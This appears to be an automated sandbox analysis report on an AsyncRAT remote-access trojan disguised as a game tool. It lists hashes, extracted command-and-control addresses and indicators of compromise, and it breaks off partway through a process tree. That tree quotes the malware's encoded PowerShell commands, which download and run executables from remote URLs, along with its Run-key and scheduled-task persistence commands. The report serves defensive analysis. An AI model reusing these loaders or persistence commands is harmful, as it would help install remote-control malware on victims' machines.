asyncrat | c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

max time kernel
144s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2022 06:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RustExternal_nls.exe
Size

658KB
MD5

1ab8dbca5e2bba39723f00907d266de7
SHA1

729cb808637568f20ac886b3fac5f3cf5ff01dee
SHA256

c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac
SHA512

d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081
SSDEEP

12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/4796-262-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/440-300-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 5 IoCs

flow	pid	Process
45	2392	powershell.exe
67	3192	powershell.exe
71	1768	powershell.exe
73	448	powershell.exe
76	1724	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

pid	Process
5116	DEFENDERFILESECURITY.EXE
2760	0.exe
1880	st0g1O1NCa.exe
4348	qBIoev3CtH.exe
4352	vtWr98HxtB.exe
1116	Yn7GYLoif4.exe
5108	9BaUAr7RHb.exe
4760	EpqepATJjk.exe
2092	ZAv21Qd4HQ.exe
1096	cYewRvAeUg.exe
2120	xsLfVQ7cMp.exe
1880	KedT6mueFe.exe
2772	dsffe4vb5.exe
1116	qweqweqweqw.exe
2956	asdsadsadsa.exe
384	tryrtytryrty.exe
5076	qweqwewqe.exe
2168	dsffe4vb5.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022f70-142.dat	upx
behavioral2/files/0x0006000000022f70-141.dat	upx
behavioral2/memory/5116-144-0x00007FF69BE40000-0x00007FF69BF9F000-memory.dmp	upx
behavioral2/memory/5116-146-0x00007FF69BE40000-0x00007FF69BF9F000-memory.dmp	upx
behavioral2/files/0x0006000000022f73-148.dat	upx
behavioral2/files/0x0006000000022f73-149.dat	upx
behavioral2/memory/2760-150-0x00007FF724D20000-0x00007FF724E83000-memory.dmp	upx
behavioral2/memory/2760-204-0x00007FF724D20000-0x00007FF724E83000-memory.dmp	upx

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	EpqepATJjk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cYewRvAeUg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Yn7GYLoif4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	9BaUAr7RHb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	ZAv21Qd4HQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	xsLfVQ7cMp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	KedT6mueFe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	qBIoev3CtH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	vtWr98HxtB.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2328 set thread context of 1520	2328	RustExternal_nls.exe	80
PID 1116 set thread context of 4796	1116	qweqweqweqw.exe	154
PID 2772 set thread context of 484	2772	dsffe4vb5.exe	155
PID 384 set thread context of 440	384	tryrtytryrty.exe	161
PID 2956 set thread context of 1820	2956	asdsadsadsa.exe	164

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1672	5076	WerFault.exe	165

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2220	schtasks.exe
388	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2328	RustExternal_nls.exe
2328	RustExternal_nls.exe
3192	powershell.exe
3192	powershell.exe
1768	powershell.exe
2392	powershell.exe
2392	powershell.exe
1768	powershell.exe
448	powershell.exe
448	powershell.exe
1724	powershell.exe
1724	powershell.exe
4372	powershell.exe
4372	powershell.exe
3192	powershell.exe
4920	powershell.exe
4920	powershell.exe
2392	powershell.exe
1768	powershell.exe
3644	powershell.exe
3644	powershell.exe
448	powershell.exe
3644	powershell.exe
4220	powershell.exe
4220	powershell.exe
1724	powershell.exe
4220	powershell.exe
1076	powershell.exe
1076	powershell.exe
4920	powershell.exe
4372	powershell.exe
1076	powershell.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
2948	powershell.exe
2948	powershell.exe
2948	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	RustExternal_nls.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	2772	dsffe4vb5.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2956	asdsadsadsa.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1524	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 1492	2328	RustExternal_nls.exe	79
PID 2328 wrote to memory of 1492	2328	RustExternal_nls.exe	79
PID 2328 wrote to memory of 1492	2328	RustExternal_nls.exe	79
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 2328 wrote to memory of 1520	2328	RustExternal_nls.exe	80
PID 1520 wrote to memory of 5116	1520	RegAsm.exe	81
PID 1520 wrote to memory of 5116	1520	RegAsm.exe	81
PID 5116 wrote to memory of 2416	5116	DEFENDERFILESECURITY.EXE	83
PID 5116 wrote to memory of 2416	5116	DEFENDERFILESECURITY.EXE	83
PID 2416 wrote to memory of 2760	2416	cmd.exe	85
PID 2416 wrote to memory of 2760	2416	cmd.exe	85
PID 2760 wrote to memory of 3372	2760	0.exe	88
PID 2760 wrote to memory of 3372	2760	0.exe	88
PID 2760 wrote to memory of 1076	2760	0.exe	90
PID 2760 wrote to memory of 1076	2760	0.exe	90
PID 3372 wrote to memory of 1880	3372	cmd.exe	92
PID 3372 wrote to memory of 1880	3372	cmd.exe	92
PID 2760 wrote to memory of 2304	2760	0.exe	93
PID 2760 wrote to memory of 2304	2760	0.exe	93
PID 1076 wrote to memory of 4348	1076	cmd.exe	95
PID 1076 wrote to memory of 4348	1076	cmd.exe	95
PID 2760 wrote to memory of 2060	2760	0.exe	96
PID 2760 wrote to memory of 2060	2760	0.exe	96
PID 2760 wrote to memory of 1836	2760	0.exe	98
PID 2760 wrote to memory of 1836	2760	0.exe	98
PID 2304 wrote to memory of 4352	2304	cmd.exe	100
PID 2304 wrote to memory of 4352	2304	cmd.exe	100
PID 2060 wrote to memory of 1116	2060	cmd.exe	101
PID 2060 wrote to memory of 1116	2060	cmd.exe	101
PID 1880 wrote to memory of 2392	1880	KedT6mueFe.exe	103
PID 1880 wrote to memory of 2392	1880	KedT6mueFe.exe	103
PID 4348 wrote to memory of 3192	4348	qBIoev3CtH.exe	102
PID 4348 wrote to memory of 3192	4348	qBIoev3CtH.exe	102
PID 2760 wrote to memory of 4576	2760	0.exe	105
PID 2760 wrote to memory of 4576	2760	0.exe	105
PID 1836 wrote to memory of 5108	1836	cmd.exe	107
PID 1836 wrote to memory of 5108	1836	cmd.exe	107
PID 2760 wrote to memory of 4928	2760	0.exe	108
PID 2760 wrote to memory of 4928	2760	0.exe	108
PID 4352 wrote to memory of 1768	4352	vtWr98HxtB.exe	111
PID 4352 wrote to memory of 1768	4352	vtWr98HxtB.exe	111
PID 2760 wrote to memory of 3724	2760	0.exe	110
PID 2760 wrote to memory of 3724	2760	0.exe	110
PID 1116 wrote to memory of 448	1116	Yn7GYLoif4.exe	115
PID 1116 wrote to memory of 448	1116	Yn7GYLoif4.exe	115
PID 2760 wrote to memory of 4744	2760	0.exe	116
PID 2760 wrote to memory of 4744	2760	0.exe	116
PID 4576 wrote to memory of 4760	4576	cmd.exe	119
PID 4576 wrote to memory of 4760	4576	cmd.exe	119
PID 4928 wrote to memory of 2092	4928	cmd.exe	123
PID 4928 wrote to memory of 2092	4928	cmd.exe	123
PID 5108 wrote to memory of 1724	5108	9BaUAr7RHb.exe	120
PID 5108 wrote to memory of 1724	5108	9BaUAr7RHb.exe	120
PID 2760 wrote to memory of 3180	2760	0.exe	122
PID 2760 wrote to memory of 3180	2760	0.exe	122
PID 3724 wrote to memory of 1096	3724	cmd.exe	127

C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
"C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  PID:1492
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
    "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2416
    - - C:\Users\Admin\AppData\Local\Temp\0.exe
        
        C:\Users\Admin\AppData\Local\Temp\0.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2760
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\st0g1O1NCa.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\st0g1O1NCa.exe
        
        C:\Users\Admin\AppData\Local\Temp\st0g1O1NCa.exe
        7⤵
        Executes dropped EXE
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
        
        "C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:484
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\qBIoev3CtH.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\qBIoev3CtH.exe
        
        C:\Users\Admin\AppData\Local\Temp\qBIoev3CtH.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADEAOQA4ADgAOAAxADkAOQA3ADMAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwB1AGkAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAcwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAagBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHEAdwBlAHEAdwBlAHEAdwBlAHEAdwAuAGUAeABlACcAKQApADwAIwB3AGkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwByAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAcQB3AGUAcQB3AC4AZQB4AGUAJwApADwAIwBnAHcAaQAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
        
        C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe
        
        "C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:2220
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:4796
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\vtWr98HxtB.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\vtWr98HxtB.exe
        
        C:\Users\Admin\AppData\Local\Temp\vtWr98HxtB.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1768
        
        C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
        
        "C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\Yn7GYLoif4.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\Yn7GYLoif4.exe
        
        C:\Users\Admin\AppData\Local\Temp\Yn7GYLoif4.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADUANAA4ADQANwA3ADEAOQA0ADQANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAcABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB0AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAByAHkAcgB0AHkAdAByAHkAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAZQBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AbQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAcgB5AHIAdAB5AHQAcgB5AHIAdAB5AC4AZQB4AGUAJwApADwAIwBiAHcAdgAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
        
        "C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:388
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\9BaUAr7RHb.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\9BaUAr7RHb.exe
        
        C:\Users\Admin\AppData\Local\Temp\9BaUAr7RHb.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
